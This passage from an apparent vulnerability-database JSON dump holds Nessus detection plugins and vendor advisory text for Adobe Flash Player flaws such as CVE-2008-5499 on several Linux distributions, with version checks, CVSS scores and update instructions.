audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"flash-player-10.0.15.3-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:56:33", "description": "An updated Adobe Flash Player package that fixes a security issue is\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe flash-plugin package contains a Firefox-compatible Adobe Flash\nPlayer Web browser plug-in.\n\nA security flaw was found in the way Flash Player displayed certain\nSWF (Shockwave Flash) content. This may have made it possible to\nexecute arbitrary code on a victim's machine, if the victim opened a\nmalicious Adobe Flash file. 
(CVE-2008-5499)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.0.15.3 for users of Red Hat\nEnterprise Linux 5 Supplementary, and 9.0.152.0 for users of Red Hat\nEnterprise 3 and 4 Extras.", "edition": 26, "published": "2009-08-24T00:00:00", "title": "RHEL 3 / 4 / 5 : flash-plugin (RHSA-2008:1047)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5.2", "cpe:/o:redhat:enterprise_linux:4.7"], "id": "REDHAT-RHSA-2008-1047.NASL", "href": "https://www.tenable.com/plugins/nessus/40736", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1047. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40736);\n script_version (\"1.42\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-5499\");\n script_bugtraq_id(32896);\n script_xref(name:\"RHSA\", value:\"2008:1047\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : flash-plugin (RHSA-2008:1047)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes a security issue is\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe flash-plugin package contains a Firefox-compatible Adobe Flash\nPlayer Web browser plug-in.\n\nA security flaw was found in the way Flash Player displayed certain\nSWF (Shockwave Flash) content. This may have made it possible to\nexecute arbitrary code on a victim's machine, if the victim opened a\nmalicious Adobe Flash file. 
(CVE-2008-5499)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.0.15.3 for users of Red Hat\nEnterprise Linux 5 Supplementary, and 9.0.152.0 for users of Red Hat\nEnterprise 3 and 4 Extras.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5499\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb08-24.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb08-24.html\"\n );\n # http://www.adobe.com/products/flashplayer/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/products/flashplayer/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1047\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1047\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"flash-plugin-9.0.152.0-1.el3.with.oss\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"flash-plugin-9.0.152.0-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.0.15.3-2.el5\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:30:11", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file. 
(CVE-2008-5499)", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : flash-player (ZYPP Patch Number 5877)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FLASH-PLAYER-5877.NASL", "href": "https://www.tenable.com/plugins/nessus/51729", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51729);\n script_version (\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"SuSE 10 Security Update : flash-player (ZYPP Patch Number 5877)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file. 
(CVE-2008-5499)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5499.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5877.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 
exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"flash-player-9.0.152.0-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:30:11", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).", "edition": 23, "published": "2008-12-21T00:00:00", "title": "openSUSE 10 Security Update : flash-player (flash-player-5878)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_FLASH-PLAYER-5878.NASL", "href": "https://www.tenable.com/plugins/nessus/35246", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-5878.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35246);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"openSUSE 10 Security Update : flash-player (flash-player-5878)\");\n script_summary(english:\"Check for the flash-player-5878 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", 
\n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) 
|| release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"flash-player-9.0.152.0-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:28", "description": "The remote host is affected by the vulnerability described in GLSA-200903-23\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player:\n The access scope of SystemsetClipboard() allows ActionScript\n programs to execute the method without user interaction\n (CVE-2008-3873).\n The access scope of FileReference.browse() and\n FileReference.download() allows ActionScript programs to execute the\n methods without user interaction (CVE-2008-4401).\n The Settings Manager controls can be disguised as normal graphical\n elements. 
This so-called 'clickjacking' vulnerability was disclosed by\n Robert Hansen of SecTheory, Jeremiah Grossman of WhiteHat Security,\n Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu of\n TopsecTianRongXin (CVE-2008-4503).\n Adam Barth (UC Berkeley) and Collin Jackson (Stanford University)\n discovered a flaw occurring when interpreting HTTP response headers\n (CVE-2008-4818).\n Nathan McFeters and Rob Carter of Ernst and Young's Advanced\n Security Center are credited for finding an unspecified vulnerability\n facilitating DNS rebinding attacks (CVE-2008-4819).\n When used in a Mozilla browser, Adobe Flash Player does not\n properly interpret jar: URLs, according to a report by Gregory\n Fleischer of pseudo-flaw.net (CVE-2008-4821).\n Alex 'kuza55' K. reported that Adobe Flash Player does not properly\n interpret policy files (CVE-2008-4822).\n The vendor credits Stefano Di Paola of Minded Security for\n reporting that an ActionScript attribute is not interpreted properly\n (CVE-2008-4823).\n Riley Hassell and Josh Zelonis of iSEC Partners reported multiple\n input validation errors (CVE-2008-4824).\n The aforementioned researchers also reported that ActionScript 2\n does not verify a member element's size when performing several known\n and other unspecified actions, that DefineConstantPool accepts an\n untrusted input value for a 'constant count' and that character\n elements are not validated when retrieved from a data structure,\n possibly resulting in a NULL pointer dereference (CVE-2008-5361,\n CVE-2008-5362, CVE-2008-5363).\n The vendor reported an unspecified arbitrary code execution\n vulnerability (CVE-2008-5499).\n Liu Die Yu of TopsecTianRongXin reported an unspecified flaw in the\n Settings Manager related to 'clickjacking' (CVE-2009-0114).\n The vendor credits Roee Hay from IBM Rational Application Security\n for reporting an input validation error when processing SWF files\n (CVE-2009-0519).\n Javier Vicente Vallejo reported via the 
iDefense VCP that Adobe\n Flash does not remove object references properly, leading to a freed\n memory dereference (CVE-2009-0520).\n Josh Bressers of Red Hat and Tavis Ormandy of the Google Security\n Team reported an untrusted search path vulnerability\n (CVE-2009-0521).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file, possibly resulting in the execution of arbitrary code with the\n privileges of the user or a Denial of Service (crash). Furthermore a\n remote attacker could gain access to sensitive information, disclose\n memory contents by enticing a user to open a specially crafted PDF file\n inside a Flash application, modify the victim's clipboard or render it\n temporarily unusable, persuade a user into uploading or downloading\n files, bypass security restrictions with the assistance of the user to\n gain access to camera and microphone, conduct Cross-Site Scripting and\n HTTP Header Splitting attacks, bypass the 'non-root domain policy' of\n Flash, and gain escalated privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "published": "2009-03-11T00:00:00", "title": "GLSA-200903-23 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "modified": "2009-03-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-200903-23.NASL", "href": "https://www.tenable.com/plugins/nessus/35904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 
200903-23.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35904);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3873\", \"CVE-2008-4401\", \"CVE-2008-4503\", \"CVE-2008-4818\", \"CVE-2008-4819\", \"CVE-2008-4821\", \"CVE-2008-4822\", \"CVE-2008-4823\", \"CVE-2008-4824\", \"CVE-2008-5361\", \"CVE-2008-5362\", \"CVE-2008-5363\", \"CVE-2008-5499\", \"CVE-2009-0114\", \"CVE-2009-0519\", \"CVE-2009-0520\", \"CVE-2009-0521\");\n script_bugtraq_id(31117, 31537, 32896, 33880, 33889, 33890);\n script_xref(name:\"GLSA\", value:\"200903-23\");\n\n script_name(english:\"GLSA-200903-23 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-23\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player:\n The access scope of SystemsetClipboard() allows ActionScript\n programs to execute the method without user interaction\n (CVE-2008-3873).\n The access scope of FileReference.browse() and\n FileReference.download() allows ActionScript programs to execute the\n methods without user interaction (CVE-2008-4401).\n The Settings Manager controls can be disguised as normal graphical\n elements. 
This so-called 'clickjacking' vulnerability was disclosed by\n Robert Hansen of SecTheory, Jeremiah Grossman of WhiteHat Security,\n Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu of\n TopsecTianRongXin (CVE-2008-4503).\n Adam Barth (UC Berkeley) and Collin Jackson (Stanford University)\n discovered a flaw occurring when interpreting HTTP response headers\n (CVE-2008-4818).\n Nathan McFeters and Rob Carter of Ernst and Young's Advanced\n Security Center are credited for finding an unspecified vulnerability\n facilitating DNS rebinding attacks (CVE-2008-4819).\n When used in a Mozilla browser, Adobe Flash Player does not\n properly interpret jar: URLs, according to a report by Gregory\n Fleischer of pseudo-flaw.net (CVE-2008-4821).\n Alex 'kuza55' K. reported that Adobe Flash Player does not properly\n interpret policy files (CVE-2008-4822).\n The vendor credits Stefano Di Paola of Minded Security for\n reporting that an ActionScript attribute is not interpreted properly\n (CVE-2008-4823).\n Riley Hassell and Josh Zelonis of iSEC Partners reported multiple\n input validation errors (CVE-2008-4824).\n The aforementioned researchers also reported that ActionScript 2\n does not verify a member element's size when performing several known\n and other unspecified actions, that DefineConstantPool accepts an\n untrusted input value for a 'constant count' and that character\n elements are not validated when retrieved from a data structure,\n possibly resulting in a NULL pointer dereference (CVE-2008-5361,\n CVE-2008-5362, CVE-2008-5363).\n The vendor reported an unspecified arbitrary code execution\n vulnerability (CVE-2008-5499).\n Liu Die Yu of TopsecTianRongXin reported an unspecified flaw in the\n Settings Manager related to 'clickjacking' (CVE-2009-0114).\n The vendor credits Roee Hay from IBM Rational Application Security\n for reporting an input validation error when processing SWF files\n (CVE-2009-0519).\n Javier Vicente Vallejo reported via the 
iDefense VCP that Adobe\n Flash does not remove object references properly, leading to a freed\n memory dereference (CVE-2009-0520).\n Josh Bressers of Red Hat and Tavis Ormandy of the Google Security\n Team reported an untrusted search path vulnerability\n (CVE-2009-0521).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file, possibly resulting in the execution of arbitrary code with the\n privileges of the user or a Denial of Service (crash). Furthermore a\n remote attacker could gain access to sensitive information, disclose\n memory contents by enticing a user to open a specially crafted PDF file\n inside a Flash application, modify the victim's clipboard or render it\n temporarily unusable, persuade a user into uploading or downloading\n files, bypass security restrictions with the assistance of the user to\n gain access to camera and microphone, conduct Cross-Site Scripting and\n HTTP Header Splitting attacks, bypass the 'non-root domain policy' of\n Flash, and gain escalated privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.0.22.87'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 
ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 79, 94, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 10.0.22.87\"), vulnerable:make_list(\"lt 10.0.22.87\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-23T05:48:45", "description": "This module exploits a vulnerability in Adobe Flash Player for Linux, version 
